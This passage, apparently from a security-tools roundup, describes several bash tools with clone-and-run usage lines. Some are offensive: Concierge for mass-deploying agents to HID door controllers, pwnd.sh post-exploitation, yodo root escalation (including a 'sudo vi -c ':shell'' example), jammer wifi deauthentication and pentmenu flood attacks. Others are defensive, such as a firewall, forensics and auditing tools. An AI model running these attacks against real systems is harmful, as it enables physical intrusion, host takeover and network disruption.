Removes agent script from targeted door controller. Used to clean up after agentdeploy.sh and triggeragent.sh. If you’ve used eh400.sh or vertx.sh to exploit the targets, use them again with the cleanup action.

* massdeploy.sh

Usage: ./massdeploy.sh <attacker ip> <target(s)> Example: ./massdeploy.sh 10.0.0.1 10.1.1.0/24
All targets must be provided in nmap acceptable format. Currently, input files are not accepted. This script simply automates findings door controllers and deploying agents.

* massclean.sh
Usage: ./massclean.sh <target(s)>
Example: ./massclean.sh 10.10.0.1/24
hid-discoveryd-enum.nse
Usage: nmap -sU -p 4070 –script hid-discoveryd-enum <target(s)>
Simple nmap script to leverage the fuctionality of the discoveryd service to identify HID EVO door controllers and enumerate system information. This nse is located in the tools directory. Simply copy it to nmap’s script directory.

Notes
Testing of these scripts were completed against three seperate HID Door controllers:
+ Edge EVO EH400
+ VertX EVO V2000
+ VertX EVO V1000
A wiki will be on the way shortly enough to provide more thorough information.

Usage and Download:

git clone https://github.com/lixmk/Concierge && Concierge
now you can run one by one thoose bash script

Source: https://github.com/lixmk

Changelog POOFITEE v0.0.1:
– At first blush, we thought POOFITEE was operational 2016-09-16, but a few bugs remained until 2016-10-01. After 2016-10-01 this “Original” branch is only expected to receive bug fixes of the ruleset, no installer enhancements.
– Tested with Ubuntu server CLI, Linux Mint, Raspberry Pi, and Pine A64 (for which you’ll have to manually load the ipset module for iptables). We expect success with many or most other Linux distros. Future expansion still planned including source code cleanup and screen layout enhancement.

POOFITEE v0.0.1

BULLET-PROOF YOUR “OWNER-ACCESS-ONLY” LINUX SERVER FROM HACKERS WITH IPTABLES AND ROBUST SHELL SCRIPTING.

Bare minimum packages and whitelist-only access to your Linux home surveillance &/or automation system such as NEST or WeMo, or your WiFi router (if port or other forwarding, or external management are in use). ENTERPRISES: Let POOFITEE create the blacklists you need! Run POOFITEE on an external ip address that should have no incoming traffic, then share with your firewalls the ipset blacklist it creates.

No hackers can get any data or communication at all out of your system when this firewalling solution is installed on it:
* Only you know how to get your remote IP address permitted by whitelist to become an authorized source address. This will be by port knocking or email. Source addresses not whitelisted are ignored as effectively as them being explicitly blacklisted. All 65536 of your ports are invisible to them.
* Only you know the IP address of your system – it’s emailed to you fresh every time your systems gets it changed by DHCP.
* You will be notified immediately by email/text of any and all source addresses that your system places on its whitelist or removes from its blacklist.
* You would still continue to use passwords and ssh keys as is prudent even for systems without firewall protection.

All this PLUS the simplicity and robustness inherent in a bare iptables and scripting-only Linux solution, PLUS the option of building an explicit blacklist of first-time hacking packets in real-time for your reference and curiosity, if your system has enough RAM.

POOFITEE

Firewalling options this install script should be able to alter from the script set defaults:
— Stop probe logging/blacklisting to save space or if you’re just not curious – comment out the crontab entry and kill the process
— Open specific ports to offer public services
— Force single-interface firewalling even though two interfaces exist
— Alter the IP address of the private-side interface from 192.168.3.1
— Dynamic re-config of interfaces: external may swap with internal and private IP on external my become public & vice versa for laptops, etc. Triggered on whenever change in external interface
— Allow installer to specify which internal interface to trust
— accommodate multiple vlans

Why anyone would want a blacklist to accumulate:
1) differentiate between neutral and hostile when providing public services,
2) assist in selecting ports for knock sequence or email knock by which are least probed,
3) just to have a blacklist so admin/owner can blacklist their own choices of Internet addresses,
4) give to other firewall software in a multi-box environment,
5) sales, marketing, winning a bet, or other reasons to prove the point to self or others,
6) curiousity

Usage & Download from git:

git clone https://github.com/kenneth558/POOFITEE-Original && cd POOFITEE-Original
chmod a+x POOFITEE
./POOFITEE

Source: https://github.com/kenneth558 | Our Post Before

Changelog create_ap v0.4:
+ All codescripting bug fixes.

create_ap v0.4

create_ap is a script for creates a NATed or Bridged WiFi Access Point.
Features
* Create an AP (Access Point) at any channel.
* Choose one of the following encryptions: WPA, WPA2, WPA/WPA2, Open (no encryption).
* Hide your SSID.
* Disable communication between clients (client isolation).
* IEEE 802.11n & 802.11ac support
* Internet sharing methods: NATed or Bridged or None (no Internet sharing).
* Choose the AP Gateway IP (only for ‘NATed’ and ‘None’ Internet sharing methods).
* You can create an AP with the same interface you are getting your Internet connection.
* You can pass your SSID and password through pipe or through arguments (see examples).

create_ap v0.3

Dependencies
General
+ bash (to run this script)
+ util-linux (for getopt)
+ procps or procps-ng
+ hostapd
+ iproute2
+ iw
+ iwconfig (you only need this if ‘iw’ can not recognize your adapter)
+ haveged (optional)

For ‘NATed’ or ‘None’ Internet sharing method
– dnsmasq
– iptables

Example Use & Download from git:

git clone https://github.com/oblique/create_ap && cd create_ap
make install

ArchLinux:
yaourt -S create_ap

Gentoo:
emerge layman
layman -f -a jorgicio
emerge net-wireless/create_ap


Examples
No passphrase (open network):
create_ap wlan0 eth0 MyAccessPoint

WPA + WPA2 passphrase:
create_ap wlan0 eth0 MyAccessPoint MyPassPhrase

AP without Internet sharing:
create_ap -n wlan0 MyAccessPoint MyPassPhrase

Bridged Internet sharing:
create_ap -m bridge wlan0 eth0 MyAccessPoint MyPassPhrase

Bridged Internet sharing (pre-configured bridge interface):
create_ap -m bridge wlan0 br0 MyAccessPoint MyPassPhrase

Internet sharing from the same WiFi interface:
create_ap wlan0 wlan0 MyAccessPoint MyPassPhrase

Choose a different WiFi adapter driver
create_ap --driver rtl871xdrv wlan0 eth0 MyAccessPoint MyPassPhrase

No passphrase (open network) using pipe:
echo -e "MyAccessPoint" | create_ap wlan0 eth0

WPA + WPA2 passphrase using pipe:
echo -e "MyAccessPoint\nMyPassPhrase" | create_ap wlan0 eth0

Enable IEEE 802.11n
create_ap --ieee80211n --ht_capab '[HT40+]' wlan0 eth0 MyAccessPoint MyPassPhrase

Client Isolation:
create_ap --isolate-clients wlan0 eth0 MyAccessPoint MyPassPhrase

Download: v0.4.zip  | v0.4.tar.gz
Source: https://github.com/oblique | Our Post Before

pwnd.sh is a post-exploitation framework (and an interactive shell) developed in Bash shell scripting. It aims to be cross-platform (Linux, Mac OS X, Solaris etc.) and with little to no external dependencies.
The Post Exploitation Phase with 3 possible plays (not mutually exclusive):
1. Further Penetrate Into the Network/Endpoints
2. Get a firmer foothold on the Network/Endpoint
3. Start Exfiltrating Data Out of the Network/Endpoint

wndsh

Tested:
* Mac OS X El Captian (10.11.3) using GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin15)
* Ubuntu 14.04.3 LTS using GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)
* Oracle Solaris 11.3 X86 using GNU bash, version 4.1.17(1)-release (i386-pc-solaris2.11)

Use and download from git:

git clone https://github.com/SafeBreach-Labs/pwndsh && cd pwndsh
cd bin/
./compile_pwnd_sh.sh
ls -la pwnd.sh
source pwnd.sh

Source: https://github.com/SafeBreach-Labs

SysScout is a fully encapsulated script that quickly and easily pulls local machine information from Linux-Based systems. A simple, easy to use Incident Response and Network Forensics tool. Unlike other scripts that require installation of dependencies and toolkits, SysScout is ready to deploy on most Linux Distros.

SysScout

Mac Forensicators NOTE: This script works for the most part in MacOS, but not completely (there are some wonky exceptions). You will also need to use a directory besides /opt as this doesn’t exist in HFS+.

Download, setup & usage:

Run these commands in a Linux-Based Terminal
git clone https://github.com/joshbrunty/SysScout /opt/SysScout/
cd /opt/SysScout/
./SysScout.sh

Source: https://github.com/joshbrunty

Yodo is a tool proves how easy it is to become root via limited sudo permissions or via dirtyc0w.
About Impact dirtyc0w
* An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
* This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.
https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails

yodo

Usage and download:

wget https://github.com/b3rito/yodo/blob/master/yodo.sh
./yodo.sh

Example: If a user has sudo privileges only on vi, he could become root by runnuing this command: sudo vi -c ':shell'
seclist@victim ~/Desktop $ sudo vi -c ':shell'
[sudo] password for seclist:
victim Desktop # whoami
root

Source: https://github.com/b3rito

jammer is A Bash script to automate the continuous circular deauthentication of all the wifi networks in your reach. Keep in mind that it is generally illegal to use the script at your neihborhood, It is designed for pen-testing purposes.

jammer v0.4

Dependencies and platform :
+ airmon-ng/aircrack-ng
+ all linux platform support.

Usage:

git clone https://github.com/billpcs/jammer && cd jammer
sudo ./jammer -y -s -d 20 -f whitelist.txt
please edit whitelist.txt before run

Source: https://github.com/billpcs

Disclaimer:
This script is only for responsible, authorised use. You are responsible for your own actions and this script is provided without warranty or guarantee of any kind. The author(s) accept no responsibility or liability on your behalf.

Latest Change pentmenu v1.3.1 7/1/2017:
* reflect latest changes also add slighly more detail around network recon and stealth scan functions
* can review README.md from menu option.
* minor syntax changes and improvements

Designed to be a simple way to implement various network pentesting functions, including network attacks, using wherever possible readily available software commonly installed on most linux distributions without having to resort to multiple specialist tools.

pentmenu v1.3.1

Requirements:
– bash
– sudo
– curl
– netcat (must support ‘-k’ option, openbsd variant recommended)
– hping3 (or nping can be used as a substitute for flood attacks)
– openssl
– stunnel
– nmap
– whois (not essential but preferred)
– nslookup (or ‘host’)

Usage and download:

wget https://raw.githubusercontent.com/GinjaChris/pentmenu/master/pentmenu
chmod +x pentmenu
./pentmenu

Source: https://github.com/GinjaChris | Our Post Before

Introduction:
Lunar is a bash scripts for generates a scored audit report of a Unix host’s security. It is based on the CIS and other frameworks. Why a shell script? I wanted a tool that was able to run on locked down systems where other tools may not be available. I also wanted a tool that ran on all versions of UNIX. Having said that there are some differences between sh and bash, so I’ve used functions only from sh. It can also can perform a lockdown. Unlike some other scripts I have added capability to backout changes. Files are backed up using cpio to a directory based on the date (see Examples below).

lunar v5.0.5

Supported Operating Systems:
+ Linux
+-+ Red Hat
+-+ Centos
+-+ Scientific Linux
+-+ SLES
+-+ Debian
+-+ Ubuntu
+ Solaris (6,7,8,9,10 and 11)
+ Mac OS X
+ FreeBSD (needs more testing)
+ AIX (needs more testing)
+ ESXi (initial support – some tests)

Latest Changelog lunar v5.0.5 Sat 14 Jan 2017:
+ Fixed code to print module information
+ Fixed audit select function
+ Initial Amazon Linux support
+ Start adding support for Amazon Linux and added vfat to modprobe check

Usage:

git clone https://github.com/lateralblast/lunar && cd lunar
./lunar.sh

Source: https://github.com/lateralblast